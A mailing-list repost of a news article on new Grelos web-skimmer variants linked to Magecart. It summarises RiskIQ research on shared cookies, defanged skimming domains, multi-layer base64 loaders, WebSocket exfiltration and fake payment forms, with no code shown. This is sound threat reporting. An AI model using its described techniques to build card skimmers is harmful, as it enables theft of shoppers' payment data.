[BreachExchange] New Grelos Skimmer Variants Siphon Credit Card Data

[Destry Winant]

https://threatpost.com/grelos-skimmer-variants-credit-card/161439/

Domains related to the new variant of the Grelos web skimmer have
compromised dozens of websites so far.

Just as seasonal online shopping kicks into high gear, new variants of
the point-of-sale Grelos skimmer malware have been identified.
Variants are targeting the payment-card data of online retail shoppers
on dozens of compromised websites, researchers warn.

The Grelos skimmer malware has been around since 2015, and its
original version is associated with what are called Groups 1 and 2
under the prolific Magecart umbrella of loosely organized
cybercriminals. However, over time new actors began to co-opt the
Grelos skimmer and reuse some of the original domains used to host the
malware. This has accumulated into what researchers say is a unique
overlap in infrastructure for the most recent variants of the skimmer
between Grelos and Magecart.

In a new analysis, researchers said that a cookie found on a
compromised website led to the discovery of Grelos – and they were
then able to find links between new variants because they had matching
infrastructure and identical records on the WHOIS query and response
protocol (widely used for querying databases).

“Recently, a unique cookie allowed RiskIQ researchers to connect a
recent variant of this skimmer to an even newer version that uses a
fake payment form to steal payment data from victims,” said
researchers with RiskIQ in an analysis this week. “Domains related to
this cookie have compromised dozens of sites so far.”

The Skimmer Variant

The new variants of the skimmer first appeared when researcher Affable
Kraut documented it via Twitter in July 2020. This version of the
skimmer features a loader stage and a skimmer stage, both of which are
base64 encoded five times over, said researchers.

The Grelos variant discovered by Kraut also used WebSockets for
skimming. The WebSocket API is a technology making it possible to open
a two-way interactive communication session between a web browser and
a server. The use of the WebSocket connection to exfiltrate sensitive
data is not new and was first observed in connection with a Magecart
Group 9 skimmer in December 2019.

Then in a separate incident, researchers investigated the threat group
Full(z) House’s recent compromise of Boom!Mobile in October. During
their investigation, researchers noticed a unique cookie, which was
connected to three additional skimming domains and several victim
domains.

These skimming domains, which included facebookapimanager[.]com and
googleapimanager[.]com, contained a more recent variant of the Grelos
variant. Researchers said the connection between the cookie and the
skimmer domains piqued their interest because skimmer domains sharing
an identical cookie is not common.

“These four domains have been hosted on several different IPs, but
most often they used infrastructure belonging to ASN 45102 – Hangzhou
Alibaba Advertising Co.,Ltd., a hosting provider that is currently
popular with several different Magecart actors,” said researchers.

This skimmer has a similar base64 encoded loader stage to one
documented by Kraut, except this loader stage is only under one layer
of encoding, with a duplicate of the encoded script tag below it
(without encoding), said researchers.

The skimmer code included a “translate” function with various phrases
used by the fake HTML payment form that it creates after it
compromises a website. These phrases include “Pay with credit or debit
card;” “Check the cardholder first name;” “We can not process your
payment,” and other phrases.

When a shopper visits a compromised website, they are presented with
the fake payment form containing these phrases. When they upload their
payment card information, that data is exfiltrated by the skimmer via
a function that stringifies the stolen data, along with the site_id,
sid, and ip (this function also features an interesting grammatical
mistake, researchers noted, using the word “sended” rather than
“sent”).

Magecart Gang

Researchers recently reported that they have seen an uptick in the
number of e-commerce sites that are being attacked by Magecart and
related groups, dovetailing with new tactics. Typically Magecart
compromise websites with web skimmers – either via a vulnerability in
the websites’ e-commerce platform, gaining access to the victim’s
network via phishing or other means, or other tactics (it’s unclear
what tactics the threat actors are using for compromising websites
with the Grelos skimmer).

In October, one of the largest known Magecart campaigns to date took
place, with nearly 2,000 e-commerce sites hacked in an automated
campaign that may be linked to a zero-day exploit. Earlier in
September, Magecart was seen using the secure messaging service
Telegram as a data-exfiltration mechanism.

Researchers with RiskIQ for their part, said they expect overlaps in
infrastructure used to host various skimmers; as well as the reuse of
skimmer code, to increase in the future.

“This complex overlap illustrates the increasingly muddy waters for
researchers tracking Magecart,” they warned.